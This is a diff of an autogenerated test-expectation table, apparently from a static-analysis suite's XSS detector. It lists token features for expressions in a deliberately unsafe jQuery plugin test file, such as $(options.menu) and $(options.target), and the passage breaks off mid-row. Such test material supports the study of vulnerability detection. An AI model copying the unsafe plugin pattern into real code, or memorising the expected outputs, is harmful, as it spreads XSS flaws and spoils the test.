autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:22:115:23 | {} | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:22:115:23 | {} | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:22:115:23 | {} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | @@ -23952,6 +156673,18 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:22:115:23 | {} | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:22:115:23 | {} | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:22:115:23 | {} | receiverName | $ | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:26 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:26 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:26 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:26 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:29 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:29 | $.fn | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:29 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:29 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:39 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:39 | $.fn.my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:39 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:39 | $.fn.my_plugin | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:48 | $.fn.my ... efaults | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:48 | $.fn.my ... efaults | InputArgumentIndex | 1 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:48 | $.fn.my ... efaults | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | @@ -23959,6 +156692,18 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:48 | $.fn.my ... efaults | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:48 | $.fn.my ... efaults | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:26:115:48 | $.fn.my ... efaults | receiverName | $ | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:28:115:29 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:28:115:29 | fn | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:28:115:29 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:28:115:29 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:31:115:39 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:31:115:39 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:31:115:39 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:31:115:39 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:41:115:48 | defaults | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:41:115:48 | defaults | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:41:115:48 | defaults | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:41:115:48 | defaults | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:51:115:57 | options | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:51:115:57 | options | InputArgumentIndex | 2 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:51:115:57 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | @@ -23966,24 +156711,180 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:51:115:57 | options | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:51:115:57 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:115:51:115:57 | options | receiverName | $ | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:17 | $(options.menu) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:17 | $(options.menu) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:17 | $(options.menu) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:17 | $(options.menu) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:17 | exceptional return of $(options.menu) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:17 | exceptional return of $(options.menu) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:17 | exceptional return of $(options.menu) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:3:116:17 | exceptional return of $(options.menu) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:5:116:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:5:116:11 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:5:116:11 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:5:116:11 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:5:116:16 | options.menu | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:5:116:16 | options.menu | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:5:116:16 | options.menu | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:5:116:16 | options.menu | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:5:116:16 | options.menu | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:5:116:16 | options.menu | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:13:116:16 | menu | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:13:116:16 | menu | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:13:116:16 | menu | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:116:13:116:16 | menu | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:3 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:3 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:3 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:19 | $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:19 | $(options.target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:19 | $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:19 | $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:19 | exceptional return of $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:19 | exceptional return of $(options.target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:19 | exceptional return of $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:3:117:19 | exceptional return of $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:5:117:11 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:5:117:11 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:5:117:11 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:5:117:11 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:5:117:18 | options.target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:5:117:18 | options.target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:5:117:18 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:5:117:18 | options.target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:5:117:18 | options.target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:5:117:18 | options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:13:117:18 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:13:117:18 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:13:117:18 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:117:13:117:18 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:15 | pluginName | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:15 | pluginName | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:15 | pluginName | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:15 | pluginName | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:29 | pluginN ... plugin" | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:29 | pluginN ... plugin" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:29 | pluginN ... plugin" | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:29 | pluginN ... plugin" | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:29 | pluginName | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:29 | pluginName | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:29 | pluginName | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:6:120:29 | pluginName | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:19:120:29 | "my_plugin" | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:19:120:29 | "my_plugin" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:19:120:29 | "my_plugin" | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:120:19:120:29 | "my_plugin" | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:17 | $.fn[pluginName] | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:17 | $.fn[pluginName] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:17 | $.fn[pluginName] | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:121:17 | $.fn[pluginName] | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:123:2 | $.fn[pl ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:123:2 | $.fn[pl ... T OK\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:123:2 | $.fn[pl ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:2:123:2 | $.fn[pl ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:121:4:121:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, 